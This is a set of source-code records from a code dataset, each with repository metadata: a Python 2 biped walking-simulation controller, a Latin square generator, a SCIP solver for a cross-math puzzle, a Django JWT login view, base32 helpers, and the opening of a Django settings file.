if frame==31: print 'elapsed time for 30 frames:', time.time()-pt[0]
if CAMERA_TRACKING:
if MULTI_VIEWER:
if cameraTargets1[frame]==None:
cameraTargets1[frame] = motionModel.getBodyPositionGlobal(0)
# cameraTargets1[frame] = motion_ori[frame].getJointPositionGlobal(0)
viewer.setCameraTarget1(cameraTargets1[frame])
if cameraTargets2[frame]==None:
cameraTargets2[frame] = controlModel.getJointPositionGlobal(0)
viewer.setCameraTarget2(cameraTargets2[frame])
else:
if cameraTargets[frame]==None:
cameraTargets[frame] = controlModel.getJointPositionGlobal(0)
viewer.setCameraTarget(cameraTargets[frame])
if plot!=None:
plot.updateVline(frame)
viewer.setPostFrameCallback_Always(postFrameCallback_Always)
plot = None
# plot = ymp.InteractivePlot()
if plot!=None:
plot.setXlimit(0, len(motion_ori))
plot.setYlimit(0., 1.)
plot.addDataSet('zero')
plot.addDataSet('diff')
plot.addDataSet('debug1')
plot.addDataSet('debug2')
def viewer_onClose(data):
if plot!=None:
plot.close()
viewer.onClose(data)
viewer.callback(viewer_onClose)
def simulateCallback(frame):
# seginfo
segIndex = seg_index[0]
curState = seginfo[segIndex]['state']
curInterval = yma.offsetInterval(acc_offset[0], seginfo[segIndex]['interval'])
stanceLegs = seginfo[segIndex]['stanceHips']
swingLegs = seginfo[segIndex]['swingHips']
stanceFoots = seginfo[segIndex]['stanceFoots']
swingFoots = seginfo[segIndex]['swingFoots']
swingKnees = seginfo[segIndex]['swingKnees']
groundHeight = seginfo[segIndex]['ground_height']
# maxStfPushFrame = seginfo[segIndex]['max_stf_push_frame']
prev_frame = frame-1 if frame>0 else 0
# prev_frame = frame
# information
# dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(frame), bodyMasses, upperMass, uppers)
# CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(frame), bodyMasses, upperMass, uppers)
## dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(frame), bodyMasses, totalMass)
## CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(frame), bodyMasses, totalMass)
# stf_tar = motion_seg.getJointPositionGlobal(stanceFoots[0], frame)
# CMr_tar = CM_tar - stf_tar
dCM_tar = motion_seg.getJointVelocityGlobal(0, prev_frame)
CM_tar = motion_seg.getJointPositionGlobal(0, prev_frame)
# dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(prev_frame), bodyMasses, upperMass, uppers)
# CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(prev_frame), bodyMasses, upperMass, uppers)
# dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(prev_frame), bodyMasses, totalMass)
# CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(prev_frame), bodyMasses, totalMass)
stf_tar = motion_seg.getJointPositionGlobal(stanceFoots[0], prev_frame)
CMr_tar = CM_tar - stf_tar
dCM = avg_dCM[0]
CM = controlModel.getJointPositionGlobal(0)
# CM = yrp.getCM(controlModel.getJointPositionsGlobal(), bodyMasses, upperMass, uppers)
# CM = yrp.getCM(controlModel.getJointPositionsGlobal(), bodyMasses, totalMass)
CMreal = yrp.getCM(controlModel.getJointPositionsGlobal(), bodyMasses, totalMass)
stf = controlModel.getJointPositionGlobal(stanceFoots[0])
CMr = CM - stf
diff_dCM = mm.projectionOnPlane(dCM-dCM_tar, (1,0,0), (0,0,1))
diff_dCM_axis = np.cross((0,1,0), diff_dCM)
rd_vec1[0] = diff_dCM; rd_vecori1[0] = CM_tar
diff_CMr = mm.projectionOnPlane(CMr-CMr_tar, (1,0,0), (0,0,1))
# rd_vec1[0] = diff_CMr; rd_vecori1[0] = stf_tar
diff_CMr_axis = np.cross((0,1,0), diff_CMr)
direction = mm.normalize2(mm.projectionOnPlane(dCM_tar, (1,0,0), (0,0,1)))
# direction = mm.normalize2(mm.projectionOnPlane(dCM, (1,0,0), (0,0,1)))
directionAxis = np.cross((0,1,0), direction)
diff_dCM_sag, diff_dCM_cor = mm.projectionOnVector2(diff_dCM, direction)
# rd_vec1[0] = diff_dCM_sag; rd_vecori1[0] = CM_tar
diff_dCM_sag_axis = np.cross((0,1,0), diff_dCM_sag)
diff_dCM_cor_axis = np.cross((0,1,0), diff_dCM_cor)
diff_CMr_sag, diff_CMr_cor = mm.projectionOnVector2(diff_CMr, direction)
diff_CMr_sag_axis = np.cross((0,1,0), diff_CMr_sag)
diff_CMr_cor_axis = np.cross((0,1,0), diff_CMr_cor)
t = (frame-curInterval[0])/float(curInterval[1]-curInterval[0])
t_raw = t
if t>1.: t=1.
p_root = motion_stitch[frame].getJointPositionGlobal(0)
R_root = motion_stitch[frame].getJointOrientationGlobal(0)
motion_seg_orig.goToFrame(frame)
motion_seg.goToFrame(frame)
motion_stitch.goToFrame(frame)
motion_debug1.append(motion_stitch[frame].copy())
motion_debug1.goToFrame(frame)
motion_debug2.append(motion_stitch[frame].copy())
motion_debug2.goToFrame(frame)
motion_debug3.append(motion_stitch[frame].copy())
motion_debug3.goToFrame(frame)
# paper implementation
M_tc.append(motion_stitch[prev_frame])
M_tc.goToFrame(frame)
P_hat.append(M_tc[frame].copy())
P_hat.goToFrame(frame)
p_temp = ym.JointPosture(skeleton)
p_temp.rootPos = controlModel.getJointPositionGlobal(0)
p_temp.setJointOrientationsLocal(controlModel.getJointOrientationsLocal())
P.append(p_temp)
P.goToFrame(frame)
# stance foot stabilize
motion_stf_stabilize.append(motion_stitch[frame].copy())
motion_stf_stabilize.goToFrame(frame)
if STANCE_FOOT_STABILIZE:
for stanceFoot in stanceFoots:
R_target_foot = motion_seg[frame].getJointOrientationGlobal(stanceFoot)
R_current_foot = motion_stf_stabilize[frame].getJointOrientationGlobal(stanceFoot)
motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot, cm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))
# R_target_foot = motion_seg[frame].getJointOrientationLocal(stanceFoot)
# R_current_foot = motion_stf_stabilize[frame].getJointOrientationLocal(stanceFoot)
# motion_stf_stabilize[frame].setJointOrientationLocal(stanceFoot, cm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))
# match stance leg
motion_match_stl.append(motion_stf_stabilize[frame].copy())
motion_match_stl.goToFrame(frame)
if MATCH_STANCE_LEG:
if curState!=yba.GaitState.STOP:
for i in range(len(stanceLegs)):
stanceLeg = stanceLegs[i]
stanceFoot = stanceFoots[i]
# # motion stance leg -> character stance leg as time goes
R_motion = motion_match_stl[frame].getJointOrientationGlobal(stanceLeg)
R_character = controlModel.getJointOrientationGlobal(stanceLeg)
motion_match_stl[frame].setJointOrientationGlobal(stanceLeg, cm.slerp(R_motion, R_character, match_stl_func(t)))
# t_y = match_stl_func_y(t)
# t_xz = match_stl_func(t)
#
# R_motion = motion_match_stl[frame].getJointOrientationGlobal(stanceLeg)
# R_character = controlModel.getJointOrientationGlobal(stanceLeg)
# R = np.dot(R_character, R_motion.T)
# R_y, R_xz = mm.projectRotation((0,1,0), R)
# motion_match_stl[frame].mulJointOrientationGlobal(stanceLeg, mm.scaleSO3(R_xz, t_xz))
# motion_match_stl[frame].mulJointOrientationGlobal(stanceLeg, mm.scaleSO3(R_y, t_y))
# swing foot placement
motion_swf_placement.append(motion_match_stl[frame].copy())
motion_swf_placement.goToFrame(frame)
if SWING_FOOT_PLACEMENT:
t_swing_foot_placement = swf_placement_func(t);
if extended[0]:
R_swp_sag = prev_R_swp[0][0]
R_swp_cor = prev_R_swp[0][1]
else:
R_swp_sag = mm.I_SO3(); R_swp_cor = mm.I_SO3()
R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_dCM_cor_axis * K_swp_vel_cor * -t_swing_foot_placement))
if np.dot(direction, diff_CMr_sag) < 0:
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_swp_vel_sag * -t_swing_foot_placement))
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag * -t_swing_foot_placement))
else:
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_swp_vel_sag_faster * -t_swing_foot_placement))
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag_faster * -t_swing_foot_placement))
R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_CMr_cor_axis * K_swp_pos_cor * -t_swing_foot_placement))
for i in range(len(swingLegs)):
swingLeg = swingLegs[i]
swingFoot = swingFoots[i]
# save swing foot global orientation
# R_swf = motion_swf_placement[frame].getJointOrientationGlobal(swingFoot)
# rotate swing leg
motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_sag)
motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_cor)
# restore swing foot global orientation
# motion_swf_placement[frame].setJointOrientationGlobal(swingFoot, R_swf)
prev_R_swp[0] = (R_swp_sag, R_swp_cor)
# swing foot height
motion_swf_height.append(motion_swf_placement[frame].copy())
motion_swf_height.goToFrame(frame)
if SWING_FOOT_HEIGHT:
for swingFoot in swingFoots:
stanceFoot = stanceFoots[0]
# save foot global orientation
R_foot = motion_swf_height[frame].getJointOrientationGlobal(swingFoot)
R_stance_foot = motion_swf_height[frame].getJointOrientationGlobal(stanceFoot)
if OLD_SWING_HEIGHT:
height_tar = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]
else:
height_tar = motion_swf_height[prev_frame].getJointPositionGlobal(swingFoot)[1] - groundHeight
d_height_tar = motion_swf_height.getJointVelocityGlobal(swingFoot, prev_frame)[1]
# height_tar += c_swf_mid_offset * swf_height_sine_func(t)
# motion_debug1[frame] = motion_swf_height[frame].copy()
# rotate
motion_swf_height[frame].rotateByTarget(controlModel.getJointOrientationGlobal(0))
# motion_debug2[frame] = motion_swf_height[frame].copy()
# motion_debug2[frame].translateByTarget(controlModel.getJointPositionGlobal(0))
if OLD_SWING_HEIGHT:
height_cur = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]
else:
height_cur = controlModel.getJointPositionGlobal(swingFoot)[1] - halfFootHeight - c_swf_offset
d_height_cur = controlModel.getJointVelocityGlobal(swingFoot)[1]
if OLD_SWING_HEIGHT:
offset_height = (height_tar - height_cur) * swf_height_func(t) * c5
else:
offset_height = ((height_tar - height_cur) * c5
+ (d_height_tar - d_height_cur) * c6) * swf_height_func(t)
offset_sine = c_swf_mid_offset * swf_height_sine_func(t)
# offset_sine = 0.
offset = 0.
offset += offset_height
offset += offset_sine
if offset > 0.:
newPosition = motion_swf_height[frame].getJointPositionGlobal(swingFoot)
newPosition[1] += offset
aik.ik_analytic(motion_swf_height[frame], swingFoot, newPosition)
else:
if HIGHER_OFFSET:
newPosition = motion_swf_height[frame].getJointPositionGlobal(stanceFoot)
newPosition[1] -= offset
aik.ik_analytic(motion_swf_height[frame], stanceFoot, newPosition)
# return
# motion_debug3[frame] = motion_swf_height[frame].copy()
# motion_debug3[frame].translateByTarget(controlModel.getJointPositionGlobal(0))
motion_swf_height[frame].rotateByTarget(R_root)
# restore foot global orientation
motion_swf_height[frame].setJointOrientationGlobal(swingFoot, R_foot)
motion_swf_height[frame].setJointOrientationGlobal(stanceFoot, R_stance_foot)
if plot!=None:
plot.addDataPoint('debug1', frame, offset_height)
plot.addDataPoint('debug2', frame, height_tar - height_cur)
# plot.addDataPoint('diff', frame, diff)
# swing foot orientation
motion_swf_orientation.append(motion_swf_height[frame].copy())
motion_swf_orientation.goToFrame(frame)
if SWING_FOOT_ORIENTATION:
swf_orientation_func = yfg.concatenate([yfg.zero, yfg.hermite2nd, yfg.one], [.25, .75])
for swingFoot in swingFoots:
R_target_foot = motion_seg[curInterval[1]].getJointOrientationGlobal(swingFoot)
R_current_foot = motion_swf_orientation[frame].getJointOrientationGlobal(swingFoot)
motion_swf_orientation[frame].setJointOrientationGlobal(swingFoot, cm.slerp(R_current_foot, R_target_foot, swf_orientation_func(t)))
# swf_stabilize_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_taking_duration])
# push orientation
# for swingFoot in swingFoots:
# R_target_foot = motion_seg[frame].getJointOrientationGlobal(swingFoot)
# R_current_foot = motion_swf_orientation[frame].getJointOrientationGlobal(swingFoot)
# motion_swf_orientation[frame].setJointOrientationGlobal(swingFoot, cm.slerp(R_current_foot, R_target_foot , swf_stabilize_func(t)))
# stance foot push
motion_stf_push.append(motion_swf_orientation[frame].copy())
motion_stf_push.goToFrame(frame)
if STANCE_FOOT_PUSH:
for swingFoot in swingFoots:
# max_t = (maxStfPushFrame)/float(curInterval[1]-curInterval[0])
# stf_push_func = yfg.concatenate([yfg.sine, yfg.zero], [max_t*2])
stf_push_func = yfg.concatenate([yfg.sine, yfg.zero], [c_taking_duration*2])
R_swp_sag = mm.I_SO3()
# R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_stp_vel * -stf_push_func(t)))
# if step_length_cur[0] < step_length_tar[0]:
# ratio = step_length_cur[0] / step_length_tar[0]
# R_max = maxmaxStfPushFrame
# R_zero =
R_swp_sag = np.dot(R_swp_sag, mm.exp((step_length_tar[0] - step_length_cur[0])*step_axis[0] * K_stp_pos * -stf_push_func(t)))
motion_stf_push[frame].mulJointOrientationGlobal(swingFoot, R_swp_sag)
# stance foot balancing
motion_stf_balancing.append(motion_stf_push[frame].copy())
motion_stf_balancing.goToFrame(frame)
if STANCE_FOOT_BALANCING:
R_stb = mm.exp(diff_dCM_axis * K_stb_vel * stf_balancing_func(t))
R_stb = np.dot(R_stb, mm.exp(diff_CMr_axis * K_stb_pos * stf_balancing_func(t)))
for stanceFoot in stanceFoots:
if frame < 5: continue
motion_stf_balancing[frame].mulJointOrientationGlobal(stanceFoot, R_stb)
# control trajectory
motion_control.append(motion_stf_balancing[frame].copy())
motion_control.goToFrame(frame)
#=======================================================================
# tracking with inverse dynamics
#=======================================================================
th_r = motion_control.getDOFPositions(frame)
th = controlModel.getDOFPositions()
dth_r = motion_control.getDOFVelocities(frame)
dth = controlModel.getDOFVelocities()
ddth_r = motion_control.getDOFAccelerations(frame)
ddth_des = yct.getDesiredDOFAccelerations(th_r, th, dth_r, dth, ddth_r, Kt, Dt)
#=======================================================================
# simulation
#=======================================================================
CP = mm.v3(0.,0.,0.)
F = mm.v3(0.,0.,0.)
avg_dCM[0] = mm.v3(0.,0.,0.)
# external force rendering info
del rd_forces[:]; del rd_force_points[:]
for fi in forceInfos:
if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):
rd_forces.append(fi.force)
rd_force_points.append(controlModel.getBodyPositionGlobal(fi.targetBody) + -mm.normalize2(fi.force)*.2)
for i in range(stepsPerFrame):
bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)
vpWorld.applyPenaltyForce(bodyIDs, contactPositionLocals, contactForces)
# apply external force
for fi in forceInfos:
if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):
controlModel.applyBodyForceGlobal(fi.targetBody, fi.force)
controlModel.setDOFAccelerations(ddth_des)
controlModel.solveHybridDynamics()
# # apply external force
# for fi in forceInfos:
# if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):
# controlModel.applyBodyForceGlobal(fi.targetBody, fi.force)
vpWorld.step()
# yvu.align2D(controlModel)
if len(contactForces) > 0:
CP += yrp.getCP(contactPositions, contactForces)
F += sum(contactForces)
avg_dCM[0] += controlModel.getJointVelocityGlobal(0)
# avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, upperMass, uppers)
# avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, totalMass)
# if len(stanceFoots)>0:
# avg_stf_v[0] += controlModel.getJointVelocityGlobal(stanceFoots[0])
# avg_stf_av[0] += controlModel.getJointAngVelocityGlobal(stanceFoots[0])
CP /= stepsPerFrame
F /= stepsPerFrame
avg_dCM[0] /= stepsPerFrame
# if len(stanceFoots)>0:
# avg_stf_v[0] /= stepsPerFrame
# avg_stf_av[0] /= stepsPerFrame
# rd_vec1[0] = avg_stf_av[0]; rd_vec1[0][0] = 0.; rd_vec1[0][2] = 0.
# rd_vecori1[0]= controlModel.getJointPositionGlobal(stanceFoots[0])
#=======================================================================
# segment editing
#=======================================================================
lastFrame = False
if SEGMENT_EDITING:
if curState==yba.GaitState.STOP:
if frame == len(motion_seg)-1:
lastFrame = True
elif (curState==yba.GaitState.LSWING or curState==yba.GaitState.RSWING) and t>c_min_contact_time:
swingID = lID if curState==yba.GaitState.LSWING else rID
contact = False
if swingID in bodyIDs:
minContactVel = 1000.
for i in range(len(bodyIDs)):
if bodyIDs[i]==swingID:
vel = controlModel.getBodyVelocityGlobal(swingID, contactPositionLocals[i])
vel[1] = 0
contactVel = mm.length(vel)
if contactVel < minContactVel: minContactVel = contactVel
if minContactVel < c_min_contact_vel: contact = True
extended[0] = False
if contact:
# print frame, 'foot touch'
lastFrame = True
acc_offset[0] += frame - curInterval[1]
elif frame == len(motion_seg)-1:
print frame, 'extend frame', frame+1
preserveJoints = []
# preserveJoints = [lFoot, rFoot]
# preserveJoints = [lFoot, rFoot, lKnee, rKnee]
# preserveJoints = [lFoot, rFoot, lKnee, rKnee, lUpLeg, rUpLeg]
stanceKnees = [rKnee] if curState==yba.GaitState.LSWING else [lKnee]
preserveJoints = [stanceFoots[0], stanceKnees[0], stanceLegs[0]]
diff = 3
motion_seg_orig.extend([motion_seg_orig[-1]])
motion_seg.extend(ymt.extendByIntegration_root(motion_seg, 1, diff))
motion_stitch.extend(ymt.extendByIntegration_constant(motion_stitch, 1, preserveJoints, diff))
# # extend for swing foot ground speed matching & swing foot height lower
## extendedPostures = ymt.extendByIntegration(motion_stitch, 1, preserveJoints, diff)
## extendedPostures = [motion_stitch[-1]]
##
# extendFrameNum = frame - curInterval[1] + 1
# k = 1.-extendFrameNum/5.
# if k<0.: k=0.
# extendedPostures = ymt.extendByIntegrationAttenuation(motion_stitch, 1, preserveJoints, diff, k)
#
## if len(swingFoots)>0 and np.inner(dCM_tar, dCM)>0.:
## print frame, 'speed matching'
## R_swf = motion_stitch[-1].getJointOrientationGlobal(swingFoots[0])
##
## p_swf = motion_stitch[-1].getJointPositionGlobal(swingFoots[0])
## v_swf = motion_stitch.getJointVelocityGlobal(swingFoots[0], frame-diff, frame)
## a_swf = motion_stitch.getJointAccelerationGlobal(swingFoots[0], frame-diff, frame)
## p_swf += v_swf * (frameTime) + a_swf * (frameTime)*(frameTime)
## aik.ik_analytic(extendedPostures[0], swingFoots[0], p_swf)
##
## extendedPostures[0].setJointOrientationGlobal(swingFoots[0], R_swf)
#
# motion_stitch.extend(extendedPostures)
extended[0] = True
else:
if frame == len(motion_seg)-1: lastFrame = True
if lastFrame:
if segIndex < len(segments)-1:
print '%d (%d): end of %dth seg (%s, %s)'%(frame, frame-curInterval[1],segIndex, yba.GaitState.text[curState], curInterval)
if plot!=None: plot.addDataPoint('diff', frame, (frame-curInterval[1])*.01)
if len(stanceFoots)>0 and len(swingFoots)>0:
# step_cur = controlModel.getJointPositionGlobal(swingFoots[0]) - controlModel.getJointPositionGlobal(stanceFoots[0])
# step_tar = motion_seg[curInterval[1]].getJointPositionGlobal(swingFoots[0]) - motion_seg[curInterval[1]].getJointPositionGlobal(stanceFoots[0])
step_cur = controlModel.getJointPositionGlobal(0) - controlModel.getJointPositionGlobal(stanceFoots[0])
step_tar = motion_seg[curInterval[1]].getJointPositionGlobal(0) - motion_seg[curInterval[1]].getJointPositionGlobal(stanceFoots[0])
step_cur = mm.projectionOnPlane(step_cur, (1,0,0), (0,0,1))
step_tar = mm.projectionOnPlane(step_tar, (1,0,0), (0,0,1))
step_cur_sag, step_cur_cor = mm.projectionOnVector2(step_cur, direction)
step_tar_sag, step_tar_cor = mm.projectionOnVector2(step_tar, direction)
step_length_tar[0] = mm.length(step_tar_sag)
if np.inner(step_tar_sag, step_cur_sag) > 0:
step_length_cur[0] = mm.length(step_cur_sag)
else:
step_length_cur[0] = -mm.length(step_cur_sag)
step_axis[0] = directionAxis
# rd_vec1[0] = step_tar_sag
# rd_vecori1[0] = motion_seg[curInterval[1]].getJointPositionGlobal(stanceFoots[0])
# rd_vec2[0] = step_cur_sag
# rd_vecori2[0] = controlModel.getJointPositionGlobal(stanceFoots[0])
seg_index[0] += 1
curSeg = segments[seg_index[0]]
stl_y_limit_num[0] = 0
stl_xz_limit_num[0] = 0
del motion_seg_orig[frame+1:]
motion_seg_orig.extend(ymb.getAttachedNextMotion(curSeg, motion_seg_orig[-1], False, False))
del motion_seg[frame+1:]
del motion_stitch[frame+1:]
transitionLength = len(curSeg)-1
# motion_seg.extend(ymb.getAttachedNextMotion(curSeg, motion_seg[-1], False, False))
# motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, motion_control[-1], transitionLength, stitch_func, True, False))
d = motion_seg[-1] - curSeg[0]
d.rootPos[1] = 0.
motion_seg.extend(ymb.getAttachedNextMotion(curSeg, d, True, False))
d = motion_control[-1] - curSeg[0]
d.rootPos[1] = 0.
motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, d, transitionLength, stitch_func, True, False))
# motion_seg.extend(ymb.getAttachedNextMotion(curSeg, motion_seg[-1], False, True))
# motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, motion_control[-1], transitionLength, stitch_func, True, True))
else:
motion_seg_orig.append(motion_seg_orig[-1])
motion_seg.append(motion_seg[-1])
motion_stitch.append(motion_control[-1])
# rendering
motionModel.update(motion_ori[frame])
# motionModel.update(motion_seg[frame])
rd_CP[0] = CP
rd_CMP[0] = (CMreal[0] - (F[0]/F[1])*CMreal[1], 0, CMreal[2] - (F[2]/F[1])*CMreal[1])
if plot!=None:
plot.addDataPoint('zero', frame, 0)
plot.updatePoints()
viewer.setSimulateCallback(simulateCallback)
if MULTI_VIEWER:
viewer.startTimer(frameTime / 1.4)
else:
viewer.startTimer(frameTime * .1)
viewer.show()
Fl.run()
pass
push_simbicon_mass()
|
[
"garethvlf@gmail.com"
] |
garethvlf@gmail.com
|
b148450073878633fd932fa4d080860c99ef9e3c
|
8fef9b5472f031385a3c0145d94f95e03e2cecbc
|
/Latino.py
|
d1ce8a1a0b5f878f705868b3bc9c0ba4d3e92d55
|
[] |
no_license
|
RoyFlo360/ITQ-IA
|
cc709f2de12eeeee890b01c74a6a6ebc6d5f696a
|
8c7dba35eb0b1bb5c7f29a03edc90abf28db2d6a
|
refs/heads/master
| 2023-06-05T06:46:11.118285
| 2021-06-27T18:23:17
| 2021-06-27T18:23:17
| 380,809,737
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 770
|
py
|
orden = int(input("Ingrese el Orden del Cuadrado : "))
nInicial = int(input("Ingrese el Número Inicial : "))
while (nInicial > orden):
print("El numero superior izquierdo debe de ser menor o igual al orden del cuadrado")
nInicial = int(input("Ingrese el Número Inicial : "))
arreglo = []
nInicialF = nInicial
for fil in range(0, orden):
aAux = []
nInicialC = nInicialF
for col in range(0, orden):
aAux.append(nInicialC)
nInicialC += 1
if (nInicialC > orden):
nInicialC = 1
arreglo.append(aAux)
nInicialF += 1
if (nInicialF > orden):
nInicialF = 1
print()
for fil in range(0, orden):
for col in range(0, orden):
print(arreglo[fil][col], end=" ")
print()
|
[
"l16140648@queretaro.tecnm.mx"
] |
l16140648@queretaro.tecnm.mx
|
2d8118fb28a7b6c6d527581345523cf0485541b9
|
671e274094b889597a2eac44a8fc4bcf583df5ac
|
/qcp/one_hot_matrix.py
|
dbba43ca76f47915331a50ff165790af4d48ad2f
|
[] |
no_license
|
Isitar/migros-cross-math-solver
|
805a0f2bbf450cf172d4ce57f745bd59f780da11
|
b0893a2dd587a85c8d11359a604a2ee5e159987d
|
refs/heads/master
| 2020-12-10T20:02:06.640653
| 2020-01-15T22:16:53
| 2020-01-15T22:16:53
| 233,696,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
from pyscipopt import Model
model = Model("migros-cross-math")
x = []
for i in range(0, 9):
x.append([])
for j in range(0, 9):
x[i].append(model.addVar(f'x{i}_{j}', vtype="BINARY"))
constraints = []
# general cross-math rules
for x_i in x:
constr = 0
for x_i_j in x_i:
constr += x_i_j
constraints.append(constr == 1)
for j in range(0, len(x_i)):
constr = 0
for i in range(0, len(x)):
constr += x[i][j]
constraints.append(constr == 1)
vals = []
for x_i in x:
val = 0
for j in range(0, len(x_i)):
val += (j + 1) * x_i[j]
vals.append(val)
# actual cross-math
constraints.append((vals[0] - vals[1]) * vals[2] == 3)
constraints.append((vals[3] + vals[4]) * vals[5] == 20)
constraints.append((vals[6] + vals[7]) + vals[8] == 20)
constraints.append(vals[0] - vals[3] + vals[6] == 13)
constraints.append((vals[1] + vals[4]) / vals[7] == 1)
constraints.append((vals[2] * vals[5]) * vals[8] == 20)
model.setObjective(0)
for cons in constraints:
model.addCons(cons)
model.optimize()
sol = model.getBestSol()
for i in range(0, len(x)):
for j in range(0, len(x[i])):
if sol[x[i][j]] == 1:
print(j + 1, end='')
if (i + 1) % 3 == 0:
print()
|
[
"luescherpascal@gmail.com"
] |
luescherpascal@gmail.com
|
29a8581e55715c55b33da3a20d3f360ae5cb218f
|
26daf6ee609ffc04d426f17b726ce91dc68aef5d
|
/chat_project/chat_project/views.py
|
384efcc1ab16b4b9968736b1fd8c4344b3b83155
|
[] |
no_license
|
tapadiyapriyanka/chat-app
|
83c84f05de0b950fe98c03aa146c99088ff982a0
|
72d0156c27266dde4723ef18f7857928e9478e37
|
refs/heads/master
| 2021-09-06T02:01:25.032759
| 2017-12-28T14:08:49
| 2017-12-28T14:08:49
| 115,386,850
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
import datetime
import jwt
from django.conf import settings
from rest_framework import parsers, renderers, status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authtoken.serializers import AuthTokenSerializer
class JSONWebTokenAuth(APIView):
throttle_classes = ()
permission_classes = ()
parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = AuthTokenSerializer
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
# print('test',serializer['username'])
user = serializer.objects['username']
token = jwt.encode({
'username': user,
'iat': datetime.datetime.utcnow(),
'nbf': datetime.datetime.utcnow() + datetime.timedelta(minutes=-5),
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=7)
}, settings.SECRET_KEY)
return Response({'token': token})
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
json_web_token_auth = JSONWebTokenAuth.as_view()
|
[
"priyatapadiya.pt@gmail.com"
] |
priyatapadiya.pt@gmail.com
|
70a634ef5333fbd011fc21983abd792a11a5cfab
|
5955aa5e04a8b976097e92cccc392eaa6f5de0b5
|
/utils/base32_utils.py
|
ce210aab79d9420f6d7cca22fd8d077f62f52b9f
|
[] |
no_license
|
joy-noah-dev/page_backend
|
42afd084864e2c91f7dca7436682a9438a566c93
|
0d0b14fdc29cb98cfdfc2d9948347c819e197761
|
refs/heads/main
| 2023-05-01T11:36:34.168606
| 2021-05-20T02:26:04
| 2021-05-20T02:26:04
| 368,667,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,900
|
py
|
import re
from base64 import b32decode, b32encode
from io import BytesIO
from typing import List
def decode_base32(data: str, altchars='+/') -> bytes:
"""
Decode base32, python requires additional padding
"""
data = re.sub(rf'[^a-zA-Z0-9{altchars}]+', '', data) # normalize
missing_padding = len(data) % 8
if missing_padding:
data += '=' * (8 - missing_padding)
return b32decode(data, altchars)
def byte_to_int(single_byte: bytes) -> int:
"""
Gets a byte and returns an integer
:param single_byte: Single byte to convert to integer
:return: Integer representation of the bytes
"""
shift = 0
result = 0
if single_byte == b"" or single_byte == "":
raise EOFError("Unexpected EOF while reading varint")
i = ord(single_byte)
result |= (i & 0x7f) << shift
return result
def int_list(data: bytes) -> list:
"""
Get a set bytes and return a list of integers representing the bytes
:param data: Bytes
:return: List of integers
"""
byte_data = BytesIO(data)
byte_list = []
single_byte = byte_data.read(1)
while single_byte != b"" and single_byte != "":
single_int = byte_to_int(single_byte)
byte_list.append(single_int)
single_byte = byte_data.read(1)
return byte_list
def encode_base32_from_list(list_of_int: List[int]) -> str:
"""
Returns a base 32 string from a list of integers
:param list_of_int: List of integers
:return: Base32 string
"""
data = BytesIO()
for i in list_of_int:
buf = b""
while True:
towrite = i & 0x7f
i >>= 7
if i:
buf += bytes((towrite | 0x80,))
else:
buf += bytes((towrite,))
break
data.write(buf)
data.seek(0)
return b32encode(data.read()).decode().replace('=', '')
|
[
"ingesql1992@hotmail.com"
] |
ingesql1992@hotmail.com
|
2fef377287f3c5888e9dcadefea6692585b5f955
|
f109a3176900e1148452201b355be90390f289fc
|
/src/blogify/settings.py
|
645d75a79823d9b11aaa46c40cde6fc504109744
|
[] |
no_license
|
Stretchddt/Blog
|
2d4d6f0ddd0f4708a0ff28c036341d887127c71b
|
3d27fb72e9cf794378e96a0ce1e2dc25d93fc7cb
|
refs/heads/master
| 2023-01-14T15:46:00.810709
| 2020-11-16T16:31:51
| 2020-11-16T16:31:51
| 313,278,693
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,494
|
py
|
"""
Django settings for blogify project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
